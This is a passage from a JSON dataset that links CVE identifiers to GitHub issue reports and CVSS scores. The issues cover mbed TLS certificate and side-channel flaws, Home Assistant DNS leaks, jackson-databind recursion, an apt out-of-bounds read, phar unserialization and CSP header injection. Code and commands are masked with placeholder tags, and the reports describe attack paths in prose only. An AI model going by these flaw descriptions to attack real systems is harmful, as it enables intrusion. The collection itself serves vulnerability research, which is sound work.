  60874. "description": "Leaking control flow (APITAG attack). Description Type: Bug Priority: Minor Bug mbed TLS build: Version NUMBERTAG OS version: SGX Discoverers: Ivan Puddu, Moritz Schneider, Miro Haller, Srdjan Capkun, ETH Zurich (i.e., not me) Short description: The authors describe in their paper a way to determine control flow in SGX enclaves by precisely timing interrupt latency. This succeeds even for balanced branches such as: APITAG The root cause is that the processor front end fetches instructions in an aligned NUMBERTAG byte window. The time to resume an instruction therefore depends on its position within this fetch window (and thus on its virtual address) and on the instructions near it, so two branch arms that execute the same instructions can still be told apart. Full description: URLTAG Solution: Remove the secret-dependent branch altogether, i.e. make the instruction stream independent of the secret rather than trying to balance the two arms. Code locations that require fixes: APITAG (bignum.c NUMBERTAG CODETAG",
  60875. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  60876. "severity": "MEDIUM",
  60877. "baseScore": 5.3,
  60878. "impactScore": 1.4,
  60879. "exploitabilityScore": 3.9
  60880. },
  60881. {
  60882. "CVE_ID": "CVE-2020-36425",
  60883. "Issue_Url_old": "https://github.com/ARMmbed/mbedtls/issues/3340",
  60884. "Issue_Url_new": "https://github.com/mbed-tls/mbedtls/issues/3340",
  60885. "Repo_new": "mbed-tls/mbedtls",
  60886. "Issue_Created_At": "2020-05-21T12:50:03Z",
  60887. "description": "It may not be necessary to check the \"revocation date\" . Description Type: Bug Bug OS ubuntu NUMBERTAG linux| mbed TLS build: Version NUMBERTAG I created a CRL whose revocation date is later than the current time. APITAG does not use this CRL because it considers the CRL invalid (see the code in /library NUMBERTAG crt.c, line NUMBERTAG ). By comparison, openssl does not check the \"revocation date\" field and treats the listed certificate(s) as revoked. The openssl developers explained that \"revocation date\u201d is useless in certificate validation and may only be used as metadata (see URLTAG ). I checked RFC NUMBERTAG and did not find any statement that \"revocation date\" matters for certificate parsing and validation. So do we still need to check the revocation date? Note the security consequence of the current behaviour: a certificate that the CA has already listed as revoked keeps verifying successfully whenever the entry's revocation date is ahead of the verifier's clock (e.g. due to clock skew), which is a fail-open. CODETAG The command I used is: APITAG The verification returns CODETAG Result of APITAG ERRORTAG root.pem CODETAG leaf.pem CODETAG test.crl CODETAG",
  60888. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  60889. "severity": "MEDIUM",
  60890. "baseScore": 5.3,
  60891. "impactScore": 1.4,
  60892. "exploitabilityScore": 3.9
  60893. },
  60894. {
  60895. "CVE_ID": "CVE-2020-36477",
  60896. "Issue_Url_old": "https://github.com/ARMmbed/mbedtls/issues/3498",
  60897. "Issue_Url_new": "https://github.com/mbed-tls/mbedtls/issues/3498",
  60898. "Repo_new": "mbed-tls/mbedtls",
  60899. "Issue_Created_At": "2020-07-17T10:10:04Z",
  60900. "description": "Erroneous handling of IP address SANs. Description Type: Bug Priority: Minor mbed TLS build: Version: checked on NUMBERTAG and git NUMBERTAG f4f9a8da, likely occurs on all versions that support SAN Actual behavior APITAG URLTAG treats all kinds of Subject Alternative Names equivalently, even where that does not make sense. In particular, the raw octets of an IP address SAN are compared byte by byte with whatever the value of cn is, which in the typical case is a hostname (specifically, in normal APITAG operation, it is the value configured via APITAG ). It is possible, for example, for a certificate to exist with an IP address SAN for APITAG (a perfectly valid IP owned by Verizon in the US) which would erroneously match a hostname of APITAG (an actual Polish retailer's website), because the encoded address bytes happen to equal the hostname's bytes. While unlikely, this seems like a possible avenue for certificate spoofing: a certificate legitimately issued for one IP address would be accepted for an unrelated hostname. This also means it is very difficult to connect to a server that actually uses an IP address SAN in its certificate, as there is no way to pass an IP address to mbed TLS when connecting. Expected behavior I would expect IP address SANs to be either ignored or compared in a more appropriate way (e.g. matched only against an expected IP address rather than a hostname, or stringified first, perhaps?)",
  60901. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  60902. "severity": "MEDIUM",
  60903. "baseScore": 5.9,
  60904. "impactScore": 3.6,
  60905. "exploitabilityScore": 2.2
  60906. },
  60907. {
  60908. "CVE_ID": "CVE-2020-36478",
  60909. "Issue_Url_old": "https://github.com/ARMmbed/mbedtls/issues/3629",
  60910. "Issue_Url_new": "https://github.com/mbed-tls/mbedtls/issues/3629",
  60911. "Repo_new": "mbed-tls/mbedtls",
  60912. "Issue_Created_At": "2020-09-01T07:30:15Z",
  60913. "description": "Certificate verification discrepancy between APITAG and mbed TLS. Description Type: Bug Priority: Unclear A verification discrepancy found with differential fuzzing. APITAG fails to verify APITAG against the APITAG CA cert, whereas mbed TLS succeeds. This might be worth looking into as it could indicate a (security) bug: mbed TLS is the more permissive side, and accepting a chain that another validator rejects is the direction that matters for security if the rejected chain is in fact invalid. Bug OS linux mbed TLS build: Latest git checkout, default configuration. Peer device TLS stack and version Not applicable Expected behavior Verification fails Actual behavior Verification succeeds Steps to reproduce Compile and run: ERRORTAG",
  60914. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  60915. "severity": "HIGH",
  60916. "baseScore": 7.5,
  60917. "impactScore": 3.6,
  60918. "exploitabilityScore": 3.9
  60919. },
  60920. {
  60921. "CVE_ID": "CVE-2020-36517",
  60922. "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/6",
  60923. "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/6",
  60924. "Repo_new": "home-assistant/plugin-dns",
  60925. "Issue_Created_At": "2020-10-09T08:33:09Z",
  60926. "description": "DNS server settings ignored for resolving LAN hosts. APITAG release with the issue: Frontend > Configuration > Info CODETAG Or use this command: hass version APITAG Journal logs: CODETAG Description of problem: _TLDR : After some time (X hours), HA stops using the user-defined DNS server and is thus no longer able to resolve hosts on the LAN._ HA is configured to use a local DNS server : APITAG Trying to resolve a local host fails : ERRORTAG On the DNS server side, the logs show no request arriving for that lookup, so the query is being sent somewhere other than the configured server. APITAG the lookup to use the specific DNS server works : CODETAG And in this case, the DNS logging indeed confirms name resolution : APITAG Doing the same on the APITAG host works without any kind of issue : CODETAG Additional info : Doing a ha dns restart solves the issue for a while (X hours), but it always returns to being broken. I migrated to APITAG a month or NUMBERTAG ago, having previously run Hassio for a few years. In a Hassio setup, this issue _never_ happened. The APITAG based setup has had this from my first install. Pleading for help on Discord yielded very little response, no useful response at all. Others are having the same issue, and are also being ignored : URLTAG",
  60927. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  60928. "severity": "HIGH",
  60929. "baseScore": 7.5,
  60930. "impactScore": 3.6,
  60931. "exploitabilityScore": 3.9
  60932. },
  60933. {
  60934. "CVE_ID": "CVE-2020-36517",
  60935. "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/17",
  60936. "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/17",
  60937. "Repo_new": "home-assistant/plugin-dns",
  60938. "Issue_Created_At": "2020-12-08T20:38:20Z",
  60939. "description": "DNS Plugin is ignoring my local DNS on startup. I've noticed that when I power cycle my machine running APITAG that local DNS resolution doesn't work at all. Nearly all of my ESP NUMBERTAG devices rely upon local DNS resolution so most devices stop working. The local DNS is set via DHCP. I don't set any upstream DNS, everything is supposed to be forwarded through my local DNS. I've found that I can get it resolved by running ha dns restart at which point my local DNS server starts getting used. CODETAG I've got Hassio supervisor APITAG on stable channel APITAG NUMBERTAG deployment production).",
  60940. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  60941. "severity": "HIGH",
  60942. "baseScore": 7.5,
  60943. "impactScore": 3.6,
  60944. "exploitabilityScore": 3.9
  60945. },
  60946. {
  60947. "CVE_ID": "CVE-2020-36517",
  60948. "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/22",
  60949. "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/22",
  60950. "Repo_new": "home-assistant/plugin-dns",
  60951. "Issue_Created_At": "2021-01-18T12:01:39Z",
  60952. "description": "Use of APITAG DNS, Privacy Breach. The APITAG module in Home Assistant uses APITAG DNS over TLS by default. This effectively sends my DNS query history, which reveals the hosts I resolve, to a commercial NUMBERTAG rd party without my permission. There is currently no way to disable this functionality. The APITAG module also attempts to look up IP NUMBERTAG AAAA records using APITAG even when IP NUMBERTAG is disabled in the supervisor network configuration. Hardcoded DNS is a breach of privacy and trust; either remove it completely, or provide an option to disable it.",
  60953. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  60954. "severity": "HIGH",
  60955. "baseScore": 7.5,
  60956. "impactScore": 3.6,
  60957. "exploitabilityScore": 3.9
  60958. },
  60959. {
  60960. "CVE_ID": "CVE-2020-36517",
  60961. "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/64",
  60962. "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/64",
  60963. "Repo_new": "home-assistant/plugin-dns",
  60964. "Issue_Created_At": "2021-11-06T16:24:00Z",
  60965. "description": "APITAG is misconfigured leading to unexpected healthcheck behaviour. APITAG is configured to healthcheck the Cloudflare fallback every NUMBERTAG minutes, however in practice, a check is performed once a minute (and retries are generated when it fails). This is also why users have reported seeing small packet storms when Cloudflare is not reachable (by MENTIONTAG here URLTAG and MENTIONTAG here URLTAG . The intended behaviour appears to be to check once every NUMBERTAG minutes CODETAG However, that is not the only check being performed, because the encompassing server block is referenced elsewhere CODETAG A check will be run once a minute against APITAG as well as the locals (if present). We can see this is the case by enabling coredns' prometheus endpoints and pointing telegraf at them FILETAG That's failures per minute each failure represents a single query (for APITAG ) sent to APITAG . However, to APITAG (and any other upstream for that matter) it's just another query, so when it's query to it's upstream (one of APITAG or APITAG ) fails, it retries and we end up with new packets hitting the wire, one after the other. In terms of the fix, it's not clear why the fallback behaviour is implemented/hardcoded in the first place (I couldn't find any architecture discussions on it in that repo, perhaps I missed them), but the correct way to have implemented this would be one of the following options Option NUMBERTAG not include APITAG in the forwards statement at all (as it's handled by the fallback). CODETAG (It'd need some logic to handle empty locals) Option NUMBERTAG Not use a separate server block CODETAG (perhaps there some other reason an entire separate server block was stood up, but I don't see any reference to it). You could also add some config to handle APITAG locally (so the healthcheck against APITAG isn't passed upstream), but that's more horrid than the current setup. 
Turning off healthchecks against the locals is likely to be undesirable, since you would then have to wait for coredns's timeouts if a local does go down, so I have not included that. The reason this isn't a PR is that it is blocked by a decision on approach. Additional Observations Whilst capturing telemetry there were a few things I noticed which might help inform a decision on the above. When in use, the Cloudflare fallback introduces a significant level of latency: FILETAG At the network level, Cloudflare is only NUMBERTAG ms away, but the average query duration for CF upstreams is half a second. The presumption is that this is due to APITAG overheads, but unfortunately coredns doesn't currently expose metrics that could verify this. I'd posit therefore that, as well as fixing the healthcheck issue: the choice to have Cloudflare enabled/disabled should be available to the user; if mandatory, the choice to use APITAG should be open to the user. I like coredns, but it does feel rather out of place in an appliance; its approach to dynamic timeouts isn't really very well tuned to the foibles of domestic connections/networks.",
  60966. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  60967. "severity": "HIGH",
  60968. "baseScore": 7.5,
  60969. "impactScore": 3.6,
  60970. "exploitabilityScore": 3.9
  60971. },
  60972. {
  60973. "CVE_ID": "CVE-2020-36517",
  60974. "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/53",
  60975. "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/53",
  60976. "Repo_new": "home-assistant/plugin-dns",
  60977. "Issue_Created_At": "2021-08-17T02:16:14Z",
  60978. "description": "Don't hard code upstream DNS resolvers. Applications should not hard code their own DNS resolvers; they should use the configuration provided by the network (via DHCP) or by the user, perhaps with an overridable default if no other option exists. This is an anti pattern: URLTAG",
  60979. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  60980. "severity": "HIGH",
  60981. "baseScore": 7.5,
  60982. "impactScore": 3.6,
  60983. "exploitabilityScore": 3.9
  60984. },
  60985. {
  60986. "CVE_ID": "CVE-2020-36517",
  60987. "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/20",
  60988. "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/20",
  60989. "Repo_new": "home-assistant/plugin-dns",
  60990. "Issue_Created_At": "2020-12-26T11:35:40Z",
  60991. "description": "Not resolving local host names. In home assistant, if I use hostnames in FILETAG they fail to resolve (eg using platform snmp ). Using the corresponding IP addresses works, but is far from ideal and means I have to use fixed IP addresses, and configuration becomes less readable and requires more maintenance. Trying to work out what the root issue is has led me to hassio dns seemingly not working as I would expect. The homeassistant docker container appears to be using APITAG for dns which is the hassio dns container. From within the homeassistant container this local hostname fails to resolve: dig APITAG and I can see from the dig output it is going out to the Internet to do the DNS lookup (so the internal hostname is sent to an external resolver). But dig APITAG APITAG from home assistant does work (not surprisingly). The strange thing is from within the hassio dns container, fully qualified and unqualified local hostname lookups do work: dig APITAG dig pdu3 But dig APITAG APITAG does not work (unsurprisingly). What I would expect is that fully qualified and unqualified hostnames should resolve as I have set the search domain to APITAG and dns server to APITAG in APITAG I don't think this has ever worked with hassio dns.",
  60992. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  60993. "severity": "HIGH",
  60994. "baseScore": 7.5,
  60995. "impactScore": 3.6,
  60996. "exploitabilityScore": 3.9
  60997. },
  60998. {
  60999. "CVE_ID": "CVE-2020-36517",
  61000. "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/51",
  61001. "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/51",
  61002. "Repo_new": "home-assistant/plugin-dns",
  61003. "Issue_Created_At": "2021-07-11T20:22:04Z",
  61004. "description": "Dns stops resolving within hours/days. Ha is configured with a local dns resolver, while all other means of resolving are blocked on our home automation subnet. When (re)started, HA dns runs perfectly fine, and can resolve all queries through the assigned server. CODETAG After a few hours, the resolver just stops resolving through the programmed server and switches to dot NUMBERTAG APITAG for all dns requests, which are all refused by the router of course. Somehow HA forgot that APITAG is its assigned dns server. I'd like to add full dns logs, but 'ha dns logs' just gives me the last errors, and not the full logfile. If there's a way to give more info, let me know and I'll add the data.",
  61005. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  61006. "severity": "HIGH",
  61007. "baseScore": 7.5,
  61008. "impactScore": 3.6,
  61009. "exploitabilityScore": 3.9
  61010. },
  61011. {
  61012. "CVE_ID": "CVE-2020-36517",
  61013. "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/50",
  61014. "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/50",
  61015. "Repo_new": "home-assistant/plugin-dns",
  61016. "Issue_Created_At": "2021-06-30T12:07:56Z",
  61017. "description": "performance impact after dns update to APITAG Since dns upgrade to APITAG my complete hassio setup is having performance issues. I am running haos on Raspberry Pi NUMBERTAG B. It's an old pi, but before dns APITAG everything was running without issues and I had no reason to upgrade hardware. Since dns upgrade, coredns will eventually get stuck at more than NUMBERTAG CPU usage constantly and everything else slows down to the level that it's unusable. Even 'ha dns restart' is failing with time out. It's happening also with clean image install without configuring any integrations. When I downgrade to dns APITAG using 'ha dns update version APITAG CPU usage is back to normal and whole system is responsive. Downgrading dns is not permanent fix as it gets automatically updated back to last version and CPU load increases again. Is there an option to permanently downgrade to dns APITAG or disable APITAG completely (if TLS is causing too much load on rpi1)? dns logs using APITAG [INFO] APITAG NUMBERTAG NS IN . udp NUMBERTAG false NUMBERTAG NOERROR NUMBERTAG s [ERROR] plugin/errors NUMBERTAG NS: tls: APITAG timed out [INFO] APITAG NUMBERTAG NS IN . udp NUMBERTAG false NUMBERTAG NOERROR NUMBERTAG s [ERROR] plugin/errors NUMBERTAG NS: tls: APITAG timed out [INFO] APITAG NUMBERTAG NS IN . udp NUMBERTAG false NUMBERTAG NOERROR NUMBERTAG s [ERROR] plugin/errors NUMBERTAG NS: tls: APITAG timed out [INFO] APITAG NUMBERTAG NS IN . udp NUMBERTAG false NUMBERTAG NOERROR NUMBERTAG s [ERROR] plugin/errors NUMBERTAG NS: tls: APITAG timed out [INFO] APITAG NUMBERTAG NS IN . udp NUMBERTAG false NUMBERTAG NOERROR NUMBERTAG s [ERROR] plugin/errors NUMBERTAG NS: tls: APITAG timed out [INFO] APITAG NUMBERTAG NS IN . udp NUMBERTAG false NUMBERTAG NOERROR NUMBERTAG s [ERROR] plugin/errors NUMBERTAG NS: tls: APITAG timed out [INFO] APITAG NUMBERTAG NS IN . 
udp NUMBERTAG false NUMBERTAG NOERROR NUMBERTAG s [ERROR] plugin/errors NUMBERTAG NS: tls: APITAG timed out [INFO] APITAG NUMBERTAG NS IN . udp NUMBERTAG false NUMBERTAG NOERROR NUMBERTAG s [ERROR] plugin/errors NUMBERTAG NS: tls: APITAG timed out [INFO] APITAG NUMBERTAG NS IN . udp NUMBERTAG false NUMBERTAG NOERROR NUMBERTAG s [ERROR] plugin/errors NUMBERTAG NS: tls: APITAG timed out dns logs using APITAG (everything else the same, just downgraded dns): [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG in APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG in APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG in APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG 
NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG in APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s core NUMBERTAG supervisor APITAG Home Assistant OS NUMBERTAG CPU arm NUMBERTAG l",
  61018. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  61019. "severity": "HIGH",
  61020. "baseScore": 7.5,
  61021. "impactScore": 3.6,
  61022. "exploitabilityScore": 3.9
  61023. },
  61024. {
  61025. "CVE_ID": "CVE-2020-36517",
  61026. "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/70",
  61027. "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/70",
  61028. "Repo_new": "home-assistant/plugin-dns",
  61029. "Issue_Created_At": "2022-01-15T15:35:56Z",
  61030. "description": "Home Assistant OS leaks private host names to cloudflare DNS service. Describe the issue you are experiencing Home Assistant OS always gets configured to load balance between my DNS resolver and Cloudflare's. I already looked under every stone, but there's no way to disable this behavior using configuration options. So if I use DNS names configured by my router instead of hard coding IP addresses, HA will switch over to Cloudflare from time to time and leak my internal hostnames to their service. Of course resolution fails in this case, too. Note that this is not caused by the hard coded fallback option, but by the hard coded load balancing option. One way to avoid this could be blocking NUMBERTAG and NUMBERTAG in my firewall, but then HA's DNS resolver goes berserk flooding my firewall logs with multiple connection attempts per second. Also, this will break further whenever developers decide to switch their user base from Cloudflare to a new data collection service. What operating system image do you use? ova (for Virtual Machines) What version of Home Assistant Operating System is installed NUMBERTAG Did you upgrade the Operating System. Yes Steps to reproduce the issue NUMBERTAG Insert local hostname in HA config NUMBERTAG Notice recurring failures in name resolution NUMBERTAG Notice packets going to NUMBERTAG and NUMBERTAG Anything in the Supervisor logs that might be useful for us? APITAG Anything in the Host logs that might be useful for us? ERRORTAG System Health information _No response_ Additional information _No response_",
  61031. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  61032. "severity": "HIGH",
  61033. "baseScore": 7.5,
  61034. "impactScore": 3.6,
  61035. "exploitabilityScore": 3.9
  61036. },
  61037. {
  61038. "CVE_ID": "CVE-2020-36517",
  61039. "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/54",
  61040. "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/54",
  61041. "Repo_new": "home-assistant/plugin-dns",
  61042. "Issue_Created_At": "2021-08-25T19:14:14Z",
  61043. "description": ".local named devices (i.e. ESPHOME devices) only resolve for a few minutes after booting HA. APITAG devices show up being APITAG only a few minutes after booting the system. After that, they turn to APITAG although they are still online. mDNS resolving seems to breakdown within a few minutes after rebooting the OS. Running Home Assistant Operating System, which is, according to the site, the recommended installation method.",
  61044. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  61045. "severity": "HIGH",
  61046. "baseScore": 7.5,
  61047. "impactScore": 3.6,
  61048. "exploitabilityScore": 3.9
  61049. },
  61050. {
  61051. "CVE_ID": "CVE-2020-36518",
  61052. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2816",
  61053. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2816",
  61054. "Repo_new": "fasterxml/jackson-databind",
  61055. "Issue_Created_At": "2020-08-13T01:12:31Z",
  61056. "description": "Optimize ERRORTAG wrt recursion. Current implementation ERRORTAG is likely relatively expensive for deeply nested Object and Array values as it uses recursion even for the \"vanilla\" case (one where there are no custom List /array or Map deserializers). It seems possible to rewrite this similar to what APITAG does. If this is not possible, we should at least: NUMBERTAG Test to see the maximum nesting level that default JVM settings can handle (for my desktop, just to get an order of magnitude idea); NUMBERTAG Possibly define a maximum recursion limit (for bonus points make it configurable).",
  61057. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  61058. "severity": "HIGH",
  61059. "baseScore": 7.5,
  61060. "impactScore": 3.6,
  61061. "exploitabilityScore": 3.9
  61062. },
  61063. {
  61064. "CVE_ID": "CVE-2020-3810",
  61065. "Issue_Url_old": "https://github.com/Debian/apt/issues/111",
  61066. "Issue_Url_new": "https://github.com/debian/apt/issues/111",
  61067. "Repo_new": "Debian/apt",
  61068. "Issue_Created_At": "2020-05-11T03:15:00Z",
  61069. "description": "An out of bounds bug occurs in the APITAG function. An out of bounds bug occurs in the APITAG function from very early version NUMBERTAG An abnormally formatted .deb file may cause the function APITAG to access memory out of bounds at APITAG . The steps and files for reproducing the bug are as follows: ERRORTAG Line NUMBERTAG of APITAG is APITAG , which checks the value of APITAG ; if it is APITAG or APITAG , then I is decremented by NUMBERTAG When the value of APITAG is just spaces, the unsigned int variable I is decremented below zero and wraps around (unsigned underflow) to APITAG , causing an out of bounds memory access and testdeb crashing. As apt is used by millions of users, it is necessary to make sure it validates the input and reports an error when a bad deb file is given. Adding detection of variable values is a straightforward fix. ERRORTAG Do you need to strengthen the file format check in other places? Thanks for your attention. FILETAG",
  61070. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  61071. "severity": "MEDIUM",
  61072. "baseScore": 5.5,
  61073. "impactScore": 3.6,
  61074. "exploitabilityScore": 1.8
  61075. },
  61076. {
  61077. "CVE_ID": "CVE-2020-4043",
  61078. "Issue_Url_old": "https://github.com/phpMussel/phpMussel/issues/167",
  61079. "Issue_Url_new": "https://github.com/phpmussel/phpmussel/issues/167",
  61080. "Repo_new": "phpmussel/phpmussel",
  61081. "Issue_Created_At": "2018-08-23T19:12:13Z",
  61082. "description": "Phar unserialization vulnerability.. An unserialization vulnerability was recently discovered which affects the phar wrapper. Due to that APITAG implements the phar wrapper for reading archives, this vulnerability also currently affects all currently supported versions of APITAG to the extent of its ability to read archives. I would __ strongly __ recommend that all APITAG users __ disable archive checking __ in APITAG until further notice. This can be achieved by setting APITAG to false in the APITAG configuration (at which point, APITAG would be unable to scan the content of archives, but would also be protected from this vulnerability). Currently planning exactly how to resolve this problem for APITAG but it'll most likely involve a complete overhaul of how APITAG handles archives, and involve completely ditching the phar wrapper in favour of something else. Anyway, I'll reply here with any relevant updates that happen, new information, etc, and announce here when the problem is resolved.",
  61083. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  61084. "severity": "CRITICAL",
  61085. "baseScore": 9.8,
  61086. "impactScore": 5.9,
  61087. "exploitabilityScore": 3.9
  61088. },
  61089. {
  61090. "CVE_ID": "CVE-2020-4067",
  61091. "Issue_Url_old": "https://github.com/coturn/coturn/issues/583",
  61092. "Issue_Url_new": "https://github.com/coturn/coturn/issues/583",
  61093. "Repo_new": "coturn/coturn",
  61094. "Issue_Created_At": "2020-06-17T10:12:53Z",
  61095. "description": "Reporting a security issue (placeholder). Hi, I would like to report a (potentially exploitable) security issue in coturn, but I am not sure what the expected process is and if you desire to discuss this issue confidentially until it is resolved. Regarding the criticality/impact: I am not completely sure, what the impact is, but I can imagine that this can be practically exploited depending on the exact scenario where coturn is used in. In summary, I'd really like to have this issue resolved. Could you please give me guidance on how to proceed?",
  61096. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  61097. "severity": "HIGH",
  61098. "baseScore": 7.5,
  61099. "impactScore": 3.6,
  61100. "exploitabilityScore": 3.9
  61101. },
  61102. {
  61103. "CVE_ID": "CVE-2020-4068",
  61104. "Issue_Url_old": "https://github.com/kylebrowning/APNSwift/issues/31",
  61105. "Issue_Url_new": "https://github.com/swift-server-community/apnswift/issues/31",
  61106. "Repo_new": "swift-server-community/apnswift",
  61107. "Issue_Created_At": "2019-07-22T13:01:29Z",
  61108. "description": "address sanitizer failure. Describe the bug This looks like quite a serious bug, the test suite is failing address sanitizer: ERRORTAG To Reproduce Steps to reproduce the behavior NUMBERTAG run tests with APITAG Expected behavior passes OS: APITAG Catalina FILETAG",
  61109. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  61110. "severity": "CRITICAL",
  61111. "baseScore": 9.8,
  61112. "impactScore": 5.9,
  61113. "exploitabilityScore": 3.9
  61114. },
  61115. {
  61116. "CVE_ID": "CVE-2020-5217",
  61117. "Issue_Url_old": "https://github.com/twitter/secure_headers/issues/418",
  61118. "Issue_Url_new": "https://github.com/github/secure_headers/issues/418",
  61119. "Repo_new": "github/secure_headers",
  61120. "Issue_Created_At": "2020-01-21T16:25:57Z",
  61121. "description": "Filtering CSP entries to prevent bypassing rules. Consider the following Rails controller action which overwrites the frame ancestors based on some user input: CODETAG This results in the following response header: APITAG This shows unexpected output, because by setting the frame ancestors the user is able to change the APITAG, opening up possibilities for XSS. One solution to this would be to filter out any CSP rules embedded inside the value of a specific CSP rule: APITAG",
  61122. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N",
  61123. "severity": "MEDIUM",
  61124. "baseScore": 5.8,
  61125. "impactScore": 1.4,
  61126. "exploitabilityScore": 3.9
  61127. },
  61128. {
  61129. "CVE_ID": "CVE-2020-5223",
  61130. "Issue_Url_old": "https://github.com/PrivateBin/PrivateBin/issues/554",
  61131. "Issue_Url_new": "https://github.com/privatebin/privatebin/issues/554",
  61132. "Repo_new": "privatebin/privatebin",
